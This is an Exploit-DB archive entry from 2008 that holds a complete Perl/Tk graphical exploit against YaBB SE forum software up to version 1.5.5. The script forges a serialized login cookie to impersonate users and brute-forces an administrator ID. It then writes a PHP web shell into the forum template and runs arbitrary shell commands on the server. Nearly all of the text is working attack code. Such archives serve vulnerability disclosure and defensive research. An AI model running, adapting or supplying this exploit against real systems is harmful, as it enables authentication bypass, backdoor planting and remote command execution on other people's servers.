YaBB SE <= 1.5.5 - Remote Command Execution Exploit

2008-01-22T00:00:00
ID EDB-ID:4963
Type exploitdb
Reporter RST/GHC
Modified 2008-01-22T00:00:00

Description

YaBB SE <= 1.5.5 Remote Command Execution Exploit. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

## YaBB SE version &lt;= 1.5.5 commands execution exploit by RST/GHC
## GUI version =)))
##  
##        THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE
##                   KEEP IT PRIVATE
##
## (c)oded by 1dt.w0lf
## http://rst.void.ru
## http://ghc.ru


use Tk;
use Tk::Menu;
use LWP::UserAgent;

$top = MainWindow-&gt;new();
$top-&gt;title("r57yabbse155ceGUI");
$top-&gt;resizable(0,0);

$url = 'http://server/forum/index.php';
$id  = '1';
$cookie_name = 'YaBBSE155';
$cmd = 'ls -la; id; uname -a;';
$_button_1_text = 'Found admin ID';
$found_admin_id = \&found_admin_id_start;
$stop = 0;

$xpl = LWP::UserAgent-&gt;new() or die;

Dialog::ui($top);

Dialog::run() if defined &Dialog::run;

Tk::MainLoop();

sub get_cookie_name()
 {
 $_text_1-&gt;delete("0.0",'end');
 $_text_1-&gt;insert('end', "[~] Try get cookie name\n");
 $res = $xpl-&gt;get($url.'?action=logout&sesc=1','Cookie'=&gt;'PHPSESSID=1');
 if(!$res-&gt;is_success) { &connect_error(); }
 else
  {
  $cookie = '';
  if($res-&gt;as_string =~ /Set-Cookie: (.*)=deleted;/) { $cookie = $1; }
  if($cookie ne '') { $_text_1-&gt;insert('end', "[+] COOKIE NAME: ".$cookie."\n"); $cookie_name = $cookie; }
  else { $_text_1-&gt;insert('end', "[-] Can't get cookie name\n"); }
  }
 }

sub found_admin_id_stop()
 {
 $stop = 1;
 $_button_1_text = 'Found admin ID';
 $found_admin_id = \&found_admin_id_start;
 }

sub found_admin_id_start()
 {
 $_button_1_text = '     Stop     ';
 $found_admin_id = \&found_admin_id_stop;
 $_text_1-&gt;delete("0.0",'end');
 $_text_1-&gt;insert('end', "[~] Try found admin ID\n");
 $success = 0;
 $error = 0;
 while(1)
  {
  last if $stop;  
  if(&login()){
  if(&user_exist())
   {
   if(&user_admin()) { $success = 1; last; }
   }
  }
  if($error) { last; }
  $id++;
  }
 if($success) { $_text_1-&gt;insert('end', "[+] ADMIN ID: ".$id."\n"); }
 $_button_1_text = 'Found admin ID';
 $found_admin_id = \&found_admin_id_start;
 $stop = 0;
 }

sub create_cookie()
 {
 return $cookie_name.'=a%3A2%3A%7Bi%3A0%3Bs%3A'.length($id).'%3A%22'.$id.'%22%3Bi%3A1%3Bb%3A1%3B%7D';   
 }

sub login()
 {
 $_text_1-&gt;insert('end', "[~] Try login with USER ID: ".$id."\n");
 $top-&gt;update();
 $res = $xpl-&gt;get($url,cookie =&gt; &create_cookie);
 if(!$res-&gt;is_success) { $error = 1; &connect_error(); return 0; }
 else { return 1; }
 }

sub user_exist()
 {
 if($res-&gt;as_string =~ /action=profile/) { $_text_1-&gt;insert('end', "[+] Successfully logged in\n"); return 1; }
 else { $_text_1-&gt;insert('end', "[-] User with this ID not exists\n"); return 0; }
 $top-&gt;update();
 }
 
sub user_admin()
 {
 if($res-&gt;as_string =~ /action=admin/) { $_text_1-&gt;insert('end', "[+] This user have admin rights\n"); return 1; }
 else { $_text_1-&gt;insert('end', "[-] This user don't have admin rights\n"); return 0; }  
 $top-&gt;update();
 }

sub create_shell()
 {
 $_text_1-&gt;delete("0.0",'end');  
 $_text_1-&gt;insert('end', "[~] Try create shell\n");
 $res = $xpl-&gt;get($url.'?action=modtemp',cookie =&gt; &create_cookie);
 if(!$res-&gt;is_success) { &connect_error(); }
 else
  {
  $_text_1-&gt;insert('end', "[~] Try get & edit template\n"); 
  @data = split(/\n/,$res-&gt;content());
  $t = $sc = '';
  $already = 0;
  foreach(@data)
   {
   if(/input type="hidden" name="sc" value="([^"]*)"/) { $sc = $1; }   
   if(/RST_GHC_TEMPLATE/) { $already = 1; last; }   
   if(/(.*)&lt;\/textarea&gt;/) { $t .= $1."\n"; $p = 0; }
   $t .= $_."\n" if $p;
   if(/&lt;textarea[^&gt;]*name="template"[^&gt;]*&gt;(.*)/) { $t .= $1."\n"; $p = 1; }
   }
  if($already)
   {
   $_text_1-&gt;insert('end', "[!] Template already modified\n[+] Skip Template editing\n");  
   }
  else
   {
   $_text_1-&gt;insert('end', "[~] Edit Template\n");
   $new_t = '&lt;? if(isset($_POST[\'RSTGHC\'])) { echo "RST_GHC_TEMPLATE"; passthru($_POST[\'RSTGHC\']); echo "RST_GHC_TEMPLATE"; } ?&gt;';

   $t =~ s/&lt;/&lt;/g;
   $t =~ s/&gt;/&gt;/g;
   $t =~ s/&quot;/"/g;
   $t =~ s/&amp;/&/g;
   $t =~ s/&nbsp;/ /g;

   $new_t .= $t;

   $res = $xpl-&gt;post($url,
                  [
                  'action'   =&gt; 'modtemp2',
                  'submit'   =&gt; 'Save',
                  'template' =&gt; $new_t,
                  'sc'       =&gt; $sc,
                  ]
                  ,cookie =&gt; 'PHPSESSID='.$sc.';'.&create_cookie);
    }
   $_text_1-&gt;insert('end', "[+] DONE!\n[!] Now you can execute commands\n");
 
  }
 }

sub execute_command()
 {
 $_text_1-&gt;delete("0.0",'end');
 $_text_1-&gt;insert('end',"[~] Try execute command\n");
 $res = $xpl-&gt;post($url,['RSTGHC'=&gt;$cmd]);
 if(!$res-&gt;is_success) { &connect_error(); }
 else
  {
  @rez = split("RST_GHC_TEMPLATE",$res-&gt;content);
  $_text_1-&gt;insert('end',@rez[1]);
  $_text_1-&gt;insert('end',"[+] EOF\n");
  }
 }
 
sub connect_error()
 {
 $_text_1-&gt;insert('end', "[-] Error: ".$res-&gt;status_line."\n");  
 }

sub Dialog::ui {
    our($root) = @_;


    # Widget Initialization
    $_frame_6 = $root-&gt;Frame(
    );
    $_frame_12 = $root-&gt;Frame(
    );
    $_frame_13 = $root-&gt;Frame(
    );
    $_label_1 = $root-&gt;Label(
    -font =&gt; 'Webdings 24 bold',
    -text =&gt; "!",
    );
    $_label_2 = $root-&gt;Label(
    -activebackground =&gt; "#ff0000",
    -activeforeground =&gt; "#ff0000",
    -font =&gt; '{Courier New} 8',
    -foreground =&gt; "#ff0000",
    -text =&gt; "YaBB SE &lt;= 1.5.5 command execution exploit by RST/GHC",
    );
    $_label_5 = $root-&gt;Label(
    -font =&gt; '{Courier New} 8',
    -text =&gt; "PATH TO INDEX.PHP:",
    );
    $_label_6 = $root-&gt;Label(
    -font =&gt; '{Courier New} 8',
    -text =&gt; "ADMIN ID:",
    );
    $_entry_4 = $root-&gt;Entry(
    -font =&gt; '{Courier New} 8',
    -relief =&gt; "groove",
    -textvariable =&gt; \$url,
    -width =&gt; 65,
    );
    $_entry_7 = $root-&gt;Entry(
    -font =&gt; '{Courier New} 8',
    -relief =&gt; "groove",
    -textvariable =&gt; \$id,
    );
    our($_entry_8) = $root-&gt;Entry(
    -font =&gt; '{Courier New} 8',
    -relief =&gt; "groove",
    -textvariable =&gt; \$cookie_name,
    );
    $_label_8 = $root-&gt;Label(
    -font =&gt; '{Courier New} 8',
    -text =&gt; "COOKIE NAME:",
    );
    $_button_2 = $root-&gt;Button(
    -font =&gt; '{Courier New} 8',
    -height =&gt; 1,
    -relief =&gt; "groove",
    -text =&gt; "Get cookie name",
    );
    $_button_3 = $root-&gt;Button(
    -font =&gt; '{Courier New} 8',
    -relief =&gt; "groove",
    -text =&gt; "Create shell",
    );
    $_label_10 = $root-&gt;Label(
    -font =&gt; '{Courier New} 8',
    -text =&gt; "COMMAND FOR EXECUTE:",
    );
    $_button_6 = $root-&gt;Button(
    -font =&gt; '{Courier New} 8',
    -relief =&gt; "groove",
    -text =&gt; "Execute command",
    );
    $_entry_11 = $root-&gt;Entry(
    -font =&gt; '{Courier New} 8',
    -relief =&gt; "groove",
    -textvariable =&gt; \$cmd,
    -width =&gt; 65,
    );
    $_text_1 = $root-&gt;Scrolled (
    'Text' ,
    -scrollbars =&gt; 'e' ,
    -wrap =&gt; 'word',
    -font =&gt; '{Courier New} 8',
    -height =&gt; 0,
    -relief =&gt; "groove",
    -width =&gt; 0,

    );
    $_button_1 = $root-&gt;Button(
    -font =&gt; '{Courier New} 8',
    -relief =&gt; "groove",
    -textvariable =&gt; \$_button_1_text,
    );
    $_label_3 = $root-&gt;Label(
    -anchor =&gt; "nw",
    -compound =&gt; "left",
    -font =&gt; '{Courier New} 8',
    -text =&gt; "* 1 default for admin",
    );
    $_label_4 = $root-&gt;Label(
    -anchor =&gt; "w",
    -font =&gt; '{Courier New} 8',
    -justify =&gt; "left",
    -text =&gt; "* YaBBSE155 default for version 1.5.5",
    );
    $_label_7 = $root-&gt;Label(
    -font =&gt; '{Courier New} 8',
    -text =&gt; "(c)oded by 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru",
    );

    # widget commands


    $_button_2-&gt;configure(
    -command =&gt; \&get_cookie_name
    );
    $_button_3-&gt;configure(
    -command =&gt; \&create_shell
    );
    $_button_6-&gt;configure(
    -command =&gt; \&execute_command
    );
    $_button_1-&gt;configure(
    -command =&gt; \$found_admin_id
    );


    # Geometry Management
    $_frame_6-&gt;grid(
    -in     =&gt; $root,
    -column =&gt; 3,
    -row    =&gt; 3,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "ew"
    );
    $_frame_12-&gt;grid(
    -in     =&gt; $root,
    -column =&gt; 1,
    -row    =&gt; 3,
    -columnspan =&gt; 2,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "ne"
    );
    $_frame_13-&gt;grid(
    -in     =&gt; $root,
    -column =&gt; 3,
    -row    =&gt; 4,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; ""
    );
    $_label_1-&gt;grid(
    -in     =&gt; $root,
    -column =&gt; 2,
    -row    =&gt; 1,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; ""
    );
    $_label_2-&gt;grid(
    -in     =&gt; $root,
    -column =&gt; 3,
    -row    =&gt; 1,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; ""
    );
    $_label_5-&gt;grid(
    -in     =&gt; $root,
    -column =&gt; 1,
    -row    =&gt; 2,
    -columnspan =&gt; 2,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "ne"
    );
    $_label_6-&gt;grid(
    -in     =&gt; $_frame_12,
    -column =&gt; 1,
    -row    =&gt; 1,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "e"
    );
    $_entry_4-&gt;grid(
    -in     =&gt; $root,
    -column =&gt; 3,
    -row    =&gt; 2,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "w"
    );
    $_entry_7-&gt;grid(
    -in     =&gt; $_frame_6,
    -column =&gt; 1,
    -row    =&gt; 1,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "w"
    );
    $_entry_8-&gt;grid(
    -in     =&gt; $_frame_6,
    -column =&gt; 1,
    -row    =&gt; 2,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "nw"
    );
    $_label_8-&gt;grid(
    -in     =&gt; $_frame_12,
    -column =&gt; 1,
    -row    =&gt; 2,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "se"
    );
    $_button_2-&gt;grid(
    -in     =&gt; $_frame_13,
    -column =&gt; 1,
    -row    =&gt; 1,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "e"
    );
    $_button_3-&gt;grid(
    -in     =&gt; $_frame_13,
    -column =&gt; 3,
    -row    =&gt; 1,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "e"
    );
    $_label_10-&gt;grid(
    -in     =&gt; $_frame_12,
    -column =&gt; 1,
    -row    =&gt; 3,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "se"
    );
    $_button_6-&gt;grid(
    -in     =&gt; $_frame_13,
    -column =&gt; 4,
    -row    =&gt; 1,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "e"
    );
    $_entry_11-&gt;grid(
    -in     =&gt; $_frame_6,
    -column =&gt; 1,
    -row    =&gt; 3,
    -columnspan =&gt; 2,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "nw"
    );
    $_text_1-&gt;grid(
    -in     =&gt; $root,
    -column =&gt; 1,
    -row    =&gt; 5,
    -columnspan =&gt; 3,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "news"
    );
    $_button_1-&gt;grid(
    -in     =&gt; $_frame_13,
    -column =&gt; 2,
    -row    =&gt; 1,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; ""
    );
    $_label_3-&gt;grid(
    -in     =&gt; $_frame_6,
    -column =&gt; 2,
    -row    =&gt; 1,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "ew"
    );
    $_label_4-&gt;grid(
    -in     =&gt; $_frame_6,
    -column =&gt; 2,
    -row    =&gt; 2,
    -columnspan =&gt; 1,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "ew"
    );
    $_label_7-&gt;grid(
    -in     =&gt; $root,
    -column =&gt; 1,
    -row    =&gt; 6,
    -columnspan =&gt; 3,
    -ipadx =&gt; 0,
    -ipady =&gt; 0,
    -padx =&gt; 0,
    -pady =&gt; 0,
    -rowspan =&gt; 1,
    -sticky =&gt; "nw"
    );


    # Resize Behavior
    $root-&gt;gridRowconfigure(1, -weight =&gt; 0, -minsize =&gt; 40, -pad =&gt; 0);
    $root-&gt;gridRowconfigure(2, -weight =&gt; 0, -minsize =&gt; 12, -pad =&gt; 0);
    $root-&gt;gridRowconfigure(3, -weight =&gt; 0, -minsize =&gt; 2, -pad =&gt; 0);
    $root-&gt;gridRowconfigure(4, -weight =&gt; 0, -minsize =&gt; 40, -pad =&gt; 0);
    $root-&gt;gridRowconfigure(5, -weight =&gt; 1, -minsize =&gt; 250, -pad =&gt; 0);
    $root-&gt;gridRowconfigure(6, -weight =&gt; 0, -minsize =&gt; 27, -pad =&gt; 0);
    $root-&gt;gridColumnconfigure(1, -weight =&gt; 0, -minsize =&gt; 5, -pad =&gt; 0);
    $root-&gt;gridColumnconfigure(2, -weight =&gt; 1, -minsize =&gt; 54, -pad =&gt; 0);
    $root-&gt;gridColumnconfigure(3, -weight =&gt; 0, -minsize =&gt; 112, -pad =&gt; 0);
    $_frame_12-&gt;gridRowconfigure(1, -weight =&gt; 0, -minsize =&gt; 2, -pad =&gt; 0);
    $_frame_12-&gt;gridRowconfigure(2, -weight =&gt; 0, -minsize =&gt; 2, -pad =&gt; 0);
    $_frame_12-&gt;gridRowconfigure(3, -weight =&gt; 0, -minsize =&gt; 2, -pad =&gt; 0);
    $_frame_12-&gt;gridColumnconfigure(1, -weight =&gt; 0, -minsize =&gt; 40, -pad =&gt; 0);
    $_frame_13-&gt;gridRowconfigure(1, -weight =&gt; 0, -minsize =&gt; 2, -pad =&gt; 0);
    $_frame_13-&gt;gridColumnconfigure(1, -weight =&gt; 0, -minsize =&gt; 5, -pad =&gt; 0);
    $_frame_13-&gt;gridColumnconfigure(2, -weight =&gt; 0, -minsize =&gt; 40, -pad =&gt; 0);
    $_frame_13-&gt;gridColumnconfigure(3, -weight =&gt; 0, -minsize =&gt; 40, -pad =&gt; 0);
    $_frame_13-&gt;gridColumnconfigure(4, -weight =&gt; 0, -minsize =&gt; 40, -pad =&gt; 0);
    $_frame_6-&gt;gridRowconfigure(1, -weight =&gt; 0, -minsize =&gt; 2, -pad =&gt; 0);
    $_frame_6-&gt;gridRowconfigure(2, -weight =&gt; 0, -minsize =&gt; 11, -pad =&gt; 0);
    $_frame_6-&gt;gridRowconfigure(3, -weight =&gt; 0, -minsize =&gt; 2, -pad =&gt; 0);
    $_frame_6-&gt;gridColumnconfigure(1, -weight =&gt; 0, -minsize =&gt; 2, -pad =&gt; 0);
    $_frame_6-&gt;gridColumnconfigure(2, -weight =&gt; 1, -minsize =&gt; 54, -pad =&gt; 0);
}

1;

# milw0rm.com [2008-01-22]